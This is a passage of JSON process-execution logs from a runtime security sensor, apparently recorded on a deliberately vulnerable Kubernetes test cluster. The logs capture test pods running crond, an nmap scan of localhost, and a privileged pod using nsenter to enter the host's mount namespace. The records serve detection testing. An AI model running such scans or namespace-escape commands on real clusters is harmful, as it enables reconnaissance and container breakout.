inInitTree","start_time":"2025-09-16T21:02:55.810556685Z","auid":4294967295,"docker":"df6701b020f964add6a9b1cc493925e","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg2MDczMDEwODU6NzE0NDcy","tid":714529,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg2MDczMDEwODU6NzE0NDcy","pid":714472,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:55.040518317Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg1OTkzMTc3MzQ6NzE0NDY0","tid":714472,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg1OTkzMTc3MzQ6NzE0NDY0","pid":714464,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208 start","flags":"execve clone","start_time":"2025-09-16T21:02:55.032534941Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714464,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:02:56.491507664Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzU4NDgyNzEyOTI6NzE0MzE5","pid":714319,"uid":0,"cwd":"/","binary":"/usr/sbin/crond","arguments":"-f -d 8","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:02:42.281489114Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-daemon-test","container":{"id":"containerd://01bf903eb1673581da113b2f76f6d5c41e75507e80a7c6005e5e92ce0fa21dfa","name":"cron-daemon-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:02:41Z","pid":1,"security_context":{}},"pod_labels":{"run":"cron-daemon-test"},"workload":"cron-daemon-test","workload_kind":"Pod"},"docker":"01bf903eb1673581da113b2f76f6d5c","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzUxNzU3NDU1OTA6NzE0MzE5","tid":714319,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzUxNzU3NDU1OTA6NzE0MzE5","pid":714319,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && crond -f -d 8\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:02:41.608963683Z","auid":4294967295,"docker":"01bf903eb1673581da113b2f76f6d5c","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","tid":714319,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","pid":714173,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:38.065522478Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","tid":714173,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","pid":714164,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 start","flags":"execve clone","start_time":"2025-09-16T21:02:38.057121279Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714164,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:02:42.281488466Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzM5OTIxNzU3OTU6NzE0MjMw","pid":714230,"uid":0,"cwd":"/","binary":"/usr/sbin/crond","arguments":"-f -d 8","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:02:40.425393724Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-daemon-test","container":{"id":"containerd://83c9f3c8659c1659f0d83a2d575a88ff5176673103ce586e343a53a6fbadb7da","name":"cron-daemon-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:02:39Z","pid":1,"security_context":{}},"pod_labels":{"run":"cron-daemon-test"},"workload":"cron-daemon-test","workload_kind":"Pod"},"docker":"83c9f3c8659c1659f0d83a2d575a88f","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzMzNDYxODg0Mjg6NzE0MjMw","tid":714230,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzMzNDYxODg0Mjg6NzE0MjMw","pid":714230,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && crond -f -d 8\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:02:39.779405520Z","auid":4294967295,"docker":"83c9f3c8659c1659f0d83a2d575a88f","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","tid":714230,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","pid":714173,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:38.065522478Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","tid":714173,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","pid":714164,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 start","flags":"execve clone","start_time":"2025-09-16T21:02:38.057121279Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714164,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:02:40.425393067Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNTA4Mjk5NDY3OTQ6NzE5OTQ2","pid":719946,"uid":0,"cwd":"/","binary":"/usr/bin/nmap","arguments":"-Pn 127.0.0.1","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:17:57.263164822Z","auid":4294967295,"pod":{"namespace":"default","name":"nmap-test","container":{"id":"containerd://71ec030ea99bd07206da4378315f9a1eb28f781141303824532c5572e0317855","name":"nmap-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:17:56Z","pid":1,"security_context":{}},"pod_labels":{"run":"nmap-test"},"workload":"nmap-test","workload_kind":"Pod"},"docker":"71ec030ea99bd07206da4378315f9a1","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDk5NzYxMDY3NTk6NzE5OTQ2","tid":719946,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDk5NzYxMDY3NTk6NzE5OTQ2","pid":719946,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache nmap && nmap -Pn 127.0.0.1\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:17:56.409324491Z","auid":4294967295,"docker":"71ec030ea99bd07206da4378315f9a1","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwODQwMTIzNDg6NzE5ODE4","tid":719946,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwODQwMTIzNDg6NzE5ODE4","pid":719818,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:17:53.517229719Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwNzU5NTc0Nzg6NzE5ODA5","tid":719818,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwNzU5NTc0Nzg6NzE5ODA5","pid":719809,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657 start","flags":"execve clone","start_time":"2025-09-16T21:17:53.509174636Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":719809,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:17:57.263163837Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDg2NTA1NzU4MTY6NzE5ODc1","pid":719875,"uid":0,"cwd":"/","binary":"/usr/bin/nmap","arguments":"-Pn 127.0.0.1","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:17:55.083793876Z","auid":4294967295,"pod":{"namespace":"default","name":"nmap-test","container":{"id":"containerd://fa186100376043b1fe3e999dce5c7ee0358b6f6fe2a6539eda22dc195ae2761a","name":"nmap-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:17:54Z","pid":1,"security_context":{}},"pod_labels":{"run":"nmap-test"},"workload":"nmap-test","workload_kind":"Pod"},"docker":"fa186100376043b1fe3e999dce5c7ee","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDc4MTY3MzIzOTk6NzE5ODc1","tid":719875,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDc4MTY3MzIzOTk6NzE5ODc1","pid":719875,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache nmap && nmap -Pn 127.0.0.1\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:17:54.249949795Z","auid":4294967295,"docker":"fa186100376043b1fe3e999dce5c7ee","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwODQwMTIzNDg6NzE5ODE4","tid":719875,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwODQwMTIzNDg6NzE5ODE4","pid":719818,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:17:53.517229719Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwNzU5NTc0Nzg6NzE5ODA5","tid":719818,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTgyNDcwNzU5NTc0Nzg6NzE5ODA5","pid":719809,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 5f7a67c3b0ddd7bc1b820ebd3dd0e8df8d07372a5a665d124633c739e9ad5657 start","flags":"execve clone","start_time":"2025-09-16T21:17:53.509174636Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":719809,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:17:55.083792809Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTM5NTc2NTk0Mjg6NzIxNzkw","pid":721790,"uid":0,"cwd":"/","binary":"/usr/bin/nsenter","arguments":"--mount=/host/proc/1/ns/mnt ls /","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:23:00.390877185Z","auid":4294967295,"pod":{"namespace":"default","name":"nsenter-test","container":{"id":"containerd://d415441639c1a93e210d6de9a97699e31eb13e7b093121603faca140af0675fe","name":"nsenter-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:22:59Z","pid":1,"security_context":{"privileged":true}},"pod_labels":{"run":"nsenter-test"},"workload":"nsenter-test","workload_kind":"Pod"},"docker":"d415441639c1a93e210d6de9a97699e","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTI3MjU5MzgzNjQ6NzIxNzkw","tid":721790,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTg1NTI3MjU5MzgzNjQ6NzIxNzkw","pid":721790,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache util-linux && nsenter --mount=/host/proc/1/ns/mnt ls /\"","flags":"execve rootcwd clone 